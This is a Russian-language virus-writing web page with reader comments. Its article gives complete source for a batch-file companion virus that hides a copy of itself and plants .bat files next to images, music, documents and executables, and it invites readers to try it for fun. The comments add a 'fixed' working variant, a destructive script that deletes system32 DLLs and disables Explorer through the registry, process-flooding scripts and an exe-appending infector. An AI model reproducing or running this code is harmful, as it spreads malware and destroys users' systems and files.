скрипт JPEG - Bat Скрипты - Каталог статей - Вирусология, взгляд из Delphi
Суббота, 10.12.2016, 21:30 Приветствую вас Гость | Группа "Гости" 


Меню сайта

Категории раздела
Delphi [94]
Программирование
HTML [2]
Теги и примеры
Bat Скрипты [21]
Различные скрипты
Разное [7]
Всё что не вошло в основные разделы

Помощь проекту

R106276538945
Z160640024212

Яндекс деньги
410011190732605

Недавние темы

Опрос
Вы к нам ещё зайдёте?
Всего ответов: 410

Главная » Статьи » Bat Скрипты

скрипт JPEG
------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.jpg) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------



Как видите, этот вирус является BAT-файлом. Принцип работы такой же как и у BAT-вирусов.

Если вы не поняли как все это работает, то объясняю. Каждая вирусная строка имеет метку "MrWeb", в каких-то строках эта метка не является пассивной, т.е. учавствует в работе вируса, например во-второй строке вируса "if '%1=='In_ goto MrWebin" эта метка содержится в метке "MrWebin", а вот в первой строке эта метка является пассивной и поэтому она заключена в знаки процента. Дак вот, при старте вируса происходит копирование вирусных строк (с меткой) в специальный файл "c:MrWeb.bat", конечно это происходит если данный файл не был раньше создан вирусом. Дальше вирус ищет *.JPG, если находит то заражает их, для этого вирус вызывает файл c:MrWeb.bat и передает ему имя файла, который следует заразить. Принцип заражения: например найден файл 001.JPG, вирус создает вирусный файл 001.JPG.bat, т.е. принцип компаньон-вируса. Юзер захочет посмотреть картинку, щелкнет по нему мышкой и увидит то, что хотел увидеть, т.е. картинку, а тем временем заразятся все другие картинки.

Круто? :) И это еще не все, кто-то может еще сомневается, что можно заразить любой файл... Так, какие типы файлов будем заражать? Файлы *.mp3 ? Музыку значит. Нет проблем.

Смотрите:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.mp3) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Только знайте, если вы запускали первый пример вируса, а теперь хотите с этим поприкалываться, то удалите сначала специальный файл "c:MrWeb.bat", а то будете потом говорить, что mp3 ни3я заразить...

Чтобы еще-то заразить... Давайте что-нибудь из классики, например *.EXE. Так...

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.exe) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Учтите, что этот пример от предыдущего отличается не только банальным "*.exe", но и убиранием вызова виндовской программы start. :)

Что? *.txt заразить? Можно, хотя и не совсем нужно. Но я же говорил, что заражать можно все, значит получайте:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (*.txt) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------


Но это были всё пистики, а теперь тыковки. Внимание. Представляю вам мега-вирус, он заражает *.jpg *.mp3 *.doc *.htm? *.xls. Причем заражает не только в текущем каталоге, но и надкаталоге, поэтому не удивляйтесь, если при его испытании, он расползется по всему винту.

Вот он:

------------------------ резать тут -----------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"c:MrWeb.bat
attrib +h c:MrWeb.bat
:MrWebru
for %%g in (..*.jpg ..*.doc ..*.htm? *.jpg *.mp3 *.doc *.htm? *.xls) do call c:MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:MrWeb.bat>>%2.bat
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
------------------------ резать тут -----------------------------

Напоминаю, если вы испытывали предыдущие примеры, то перед испытанием этого удалите файл c:MrWeb.bat.

Если у вас проскакивает мысля о том, чтобы заражать "*.*", т.е. все типы файлов, то скажу, что это возможно, только нужно сделать, чтобы вирус пропускал *.bat, если это не сделать, то получится не вирус, а прикольный троян, можете проверить ;).
Категория: Bat Скрипты | Добавил: dolphin (30.10.2009)
Просмотров: 7781 | Комментарии: 12 | Рейтинг: 4.1/9

Всего комментариев: 121 2 »
avatar
1
КАК ВАМ ТАКОЙ СКРИПТ???
@echo off
%SystemRoot%/system32/rundll32 user32, SwapMouseButton >nul
time 0:00 >nul
msg * "Format C:YOU'RE HACKED!" >nul
del "%SystemRoot%\Web\Wallpaper" /q >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoControlPanel /t REG_DWORD /d 1 /f >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer\RestrictRun /v 1 /t REG_DWORD /d %SystemRoot%\explorer.exe /f >nul
del "%SystemRoot%\system32\*.dll" /q >nul
reg add HKCU\Software\Microsoft\Windows\CurrentVersion\Policies\Explorer /v NoDesktop /t REG_DWORD /d 1 /f >nul
я его на своем же компе проверил! пришлось винду переустановить))) А ПОЧЕМУ? ПОТОМУ ЧТО ТАМ ЕСТЬ СТРОКА del "%SystemRoot%\system32\*.dll"!!!!!!!!!!!!!!!!!!!!!!!!!!!!!!! СИСТЕМКЕ КИРДЫК НАХЕР! biggrin biggrin biggrin
avatar
2
А делфи? Дай плз исходник на делфи пиши в ЛС smile
А так статья хорошая
avatar
3
был исходник где-то посмотрю
avatar
4
Вы куку чтоли!!! Ваш вирь не пашет!!!!!! Вот я ошибки исправил и дописал скрипт.
-----------------------------------------------------
@echo off%[MrWeb]%
if '%1=='In_ goto MrWebin
if exist c:MrWeb.bat goto MrWebru
if not exist %0 goto MrWeben
find "MrWeb"<%0>c:\MrWeb.bat
attrib +h c:\MrWeb.bat
:MrWebru
for %%g in (*.bmp) do call c:\MrWeb In_ %%g
goto MrWeben
:MrWebin
if exist %2.bat goto MrWeben
type c:\MrWeb.bat>>%2.bat
attrib +h %2 %[MrWeb]%
echo start %2>>%2.bat%[MrWeb]%
:MrWeben
----------------------------------------------------
Вот проверяйте на своих компах!!! всёравно от этого виря толку мало и вреда никаково!! а прикалываться можно!! biggrin
И из-за вас на всех сайтах были допущены жестокие ошибки angry
avatar
5
А да ещё можно писать любые форматы
avatar
6
Кстати если заражать mp3 форматы то касперский антивирус будет палить killed
avatar
7
Вот вам на ум вывел я ещё один слабый но прикольный вирь! biggrin запускайте не бойтесь очень оригинально biggrin ! СКОПИРУЙТЕ ЭТОТ ТЕКСТ и вставьте себе в блокнот типо Prikol.bat
@echo off
start Љ®ЇЁп
Да ещё такова виря нет нигде!!! biggrin не на каком сайте!! так что я рейтинг натянул этому сайту!!
Этот вирь открывает очень много пустых досовских окошек у мя комп ни завис. Незнай как у других будет biggrin
Выведу новый вирус напишу!!!
Да ещё этот вирь не палится!!!! biggrin
avatar
8
Люди хотите чтобы ваш комп здох от перенагрузки ЦП так вот пишем это:
@echo off
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
start Љ®ЇЁп
Вирь после запуска неотключить тока если перезапустить комп!!!
Я проверил его на себе biggrin !! У мя до системной ошибки и дальше пошёл! biggrin !
Комп Завис по полной!! Нагрузка ЦП на пределе!!! biggrin Короче реальный вирус!!!! biggrin
avatar
9
Мои вири все в формате *.BAT
avatar
10
ХАКЕРЫ ВСЕГО МИРРА!!!!!! ВЗГЛЯНЬТЕ НА ЭТОТ БАТ ВИРУССС:
@echo off
for %%g in (*.exe) do copy %0>>%2 %%g
Этот БАТ скрипт добавляет свой код во все exe файлы себя. хочу отметить что при том когда скрипт был добавлен в ексешник он работает как обычно. при этом вес его до заражения был меньше значит он заразился. но есть минус sad !!! скрипты добавленные невоспроизводят свои функции в ексешнике. я попробую переписать машинный код в бат а он в новый ексе и посматрю что выйдет cool надеюсь я помог немного сайту с новыми вирями на бате smile smile smile
1-10 11-12
avatar
Профиль


Логин:
Пароль:

Поиск

Наша кнопка

Вирусология, взгляд из Delphi



Статистика
HSDN :: Рейтинг сайтов WOlist.ru - каталог качественных сайтов Рунета Яндекс.Метрика Счетчик тИЦ и PR
Статистика материалов
Файлов: 364
Форум: 1128/7979
Коментариев: 760
Новостей: 27

Статистика пользователей
Всего: 385
За неделю: 2
Вчера: 0
Сегодня: 0
Всего онлайн: 2
Гостей: 2
Пользователей: 0

delfcode.ru © 2008 - 2016 Хостинг от uCoz